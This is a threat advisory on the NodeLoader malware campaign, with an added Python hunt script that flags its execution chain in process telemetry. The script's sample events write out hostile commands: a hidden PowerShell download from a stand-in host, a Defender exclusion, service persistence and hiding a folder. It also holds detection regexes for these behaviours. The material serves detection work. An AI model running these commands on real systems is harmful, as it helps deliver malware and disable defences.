Threat Advisory

NodeLoader Malware Targets Windows to Distribute Miners and Stealers

Threat: Malware
Targeted Region: Global
Targeted Sector: Technology & IT
Criticality: High


EXECUTIVE SUMMARY:

A new malware campaign has been discovered that uses Node.js applications for Windows to distribute cryptocurrency miners and information stealers. The malware family, named NodeLoader, consists of Node.js code compiled into standalone Windows executables that fetch second-stage payloads, including the XMRig miner, Lumma Stealer and Phemedrone Stealer. Node.js is widely used for building web services but rarely for client-side desktop applications, so antivirus coverage for compiled Node.js executables is limited. The campaign combines social engineering with evasion techniques to bypass security controls.


NodeLoader is distributed through fake websites that imitate legitimate gaming platforms. These sites, often promoted through links in YouTube videos, lead users to download ZIP archives containing the malicious NodeLoader executable. The executable is Node.js code compiled into a standalone Windows binary with the pkg package from NPM; when run, it launches a PowerShell script that downloads and executes the second-stage payloads. To obtain elevated privileges, NodeLoader uses the sudo-prompt module, an open-source package available on GitHub and NPM that asks the user to approve elevation through the operating system's own prompt rather than exploiting a vulnerability. Once elevated, the malware installs itself in hidden directories and downloads additional payloads such as cryptocurrency miners and information stealers; the XMRig miner and Phemedrone Stealer were both observed in this campaign. The attack chain is designed to evade detection: NodeLoader checks for certain running processes and terminates if they are not found, tampers with Windows security features, and creates persistence mechanisms.
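The execution chain described above leaves a recognisable shape in process-creation telemetry: an executable unpacked into a user-writable folder spawns PowerShell, which downloads a payload, asks for elevation, tampers with Defender and installs persistence. The following hunt routine is an added example written for this advisory, not code from the advisory, from Zscaler's report or from the malware itself. It walks Sysmon-style process-creation events (the field names and the sample events are constructed), flags a user-launched executable that spawns PowerShell, and tags each behaviour found underneath it with the ATT&CK technique from the threat profile. The specific command-line patterns it looks for (download cradles, `Start-Process -Verb RunAs` as the shape of the elevation prompt, `Add-MpPreference` exclusions, `sc create` for persistence, `attrib +h` for the hidden directory) are assumptions about how those behaviours usually surface in logs, not indicators taken from the report.

```python
"""Hunt for a NodeLoader-style execution chain in process-creation telemetry.

Added example for this advisory; not code from the advisory, from Zscaler's
report or from the malware. Event fields mimic Sysmon Event ID 1 and the
sample events are constructed. The regexes are assumptions about how the
described behaviours appear on a command line, not indicators from the report.
"""
import re
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str    # its command line


@dataclass
class Finding:
    root_pid: int
    root_image: str
    techniques: list = field(default_factory=list)   # ATT&CK IDs, may repeat
    evidence: list = field(default_factory=list)

    @property
    def score(self) -> int:
        """Number of distinct techniques seen under this root process."""
        return len(set(self.techniques))


# Where a ZIP fetched from a fake game site usually gets unpacked (assumption; tune per estate).
USER_WRITABLE = re.compile(r"\\(Downloads|Desktop|Temp|AppData\\Local\\Temp)\\", re.I)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)

# (ATT&CK ID, label, command-line pattern). IDs follow the advisory's threat
# profile; T1564 (Hide Artifacts) is added for the hidden install directory.
RULES = [
    ("T1059", "PowerShell download cradle",
     re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer", re.I)),
    ("T1059", "hidden or encoded PowerShell",
     re.compile(r"-(encodedcommand|enc|ec|e)\s|-w(indowstyle)?\s+hidden", re.I)),
    ("T1204", "UAC elevation prompt (assumed sudo-prompt shape)",
     re.compile(r"Start-Process\b.*-Verb\s+RunAs", re.I)),
    ("T1562", "Defender exclusion added or real-time protection disabled",
     re.compile(r"(Add|Set)-MpPreference\b.*-(Exclusion\w+|DisableRealtimeMonitoring)", re.I)),
    ("T1543", "service created for persistence",
     re.compile(r"\bsc(\.exe)?\s+create\b|\bNew-Service\b", re.I)),
    ("T1564", "install directory marked hidden",
     re.compile(r"\battrib(\.exe)?\b.*\+h", re.I)),
]


def build_tree(events):
    """Map parent pid -> list of child events."""
    children = {}
    for ev in events:
        children.setdefault(ev.ppid, []).append(ev)
    return children


def descendants(children, pid):
    """Yield every process below pid, depth-first."""
    stack = list(children.get(pid, []))
    while stack:
        ev = stack.pop()
        yield ev
        stack.extend(children.get(ev.pid, []))


def hunt(events):
    """Return one Finding per user-writable-path executable that spawns PowerShell."""
    children = build_tree(events)
    findings = []
    for root in events:
        if not USER_WRITABLE.search(root.image):
            continue
        if not any(POWERSHELL.search(k.image) for k in children.get(root.pid, [])):
            continue
        f = Finding(root.pid, root.image, ["T1204"],
                    [f"pid {root.pid}: user-launched executable spawned PowerShell"])
        for ev in descendants(children, root.pid):
            for tid, label, pat in RULES:
                if pat.search(ev.cmdline):
                    f.techniques.append(tid)
                    f.evidence.append(f"pid {ev.pid}: {label}")
        findings.append(f)
    return findings


# Constructed sample: a NodeLoader-like chain (pid 200 tree) next to a benign installer (pid 300 tree).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Users\alice\Downloads\GameLauncher\Launcher.exe", "Launcher.exe"),
    ProcEvent(201, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -ep bypass -c "Invoke-WebRequest -Uri http://example.invalid/stage2.exe -OutFile $env:APPDATA\svc\stage2.exe"'),
    ProcEvent(202, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe Start-Process -FilePath C:\Users\alice\AppData\Local\Temp\execute.bat -Verb RunAs"),
    ProcEvent(203, 202, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\execute.bat"),
    ProcEvent(204, 203, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe Add-MpPreference -ExclusionPath $env:APPDATA\svc"),
    ProcEvent(205, 203, r"C:\Windows\System32\attrib.exe", r"attrib +h +s C:\Users\alice\AppData\Roaming\svc"),
    ProcEvent(206, 203, r"C:\Windows\System32\sc.exe",
              r"sc create svcupd binPath= C:\Users\alice\AppData\Roaming\svc\stage2.exe start= auto"),
    ProcEvent(300, 100, r"C:\Users\alice\Downloads\installer.exe", "installer.exe /quiet"),
    ProcEvent(301, 300, r"C:\Windows\System32\msiexec.exe", "msiexec.exe /i app.msi"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.root_image} (pid {f.root_pid}) score={f.score} techniques={sorted(set(f.techniques))}")
        for line in f.evidence:
            print("  -", line)
```

A score of 1 (an executable in Downloads that merely spawns PowerShell) is common for legitimate installers, so alert on findings that combine three or more distinct techniques and review the evidence lines rather than the root image alone; the patterns and the user-writable paths should be tuned to the estate before the rule is put into production.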

As game streaming and community platforms grow in popularity, threat actors are increasingly using them to distribute malware. The use of Node.js for malicious purposes, combined with evasion tactics, calls for heightened security awareness and improved detection capabilities. Controls such as TLS inspection of downloads and sandbox analysis of unknown executables help identify and mitigate these threats. This campaign highlights the evolving tactics in use and the importance of continuous monitoring and adaptation of security measures.

 

THREAT PROFILE:

Tactic            Technique ID   Technique
Execution         T1204          User Execution
Execution         T1059          Command and Scripting Interpreter
Persistence       T1543          Create or Modify System Process
Defense Evasion   T1562          Impair Defenses
Exfiltration      T1041          Exfiltration Over C2 Channel

 

REFERENCES:

The following reports contain further technical details:
https://www.zscaler.com/blogs/security-research/nodeloader-exposed-node-js-malware-evading-detection
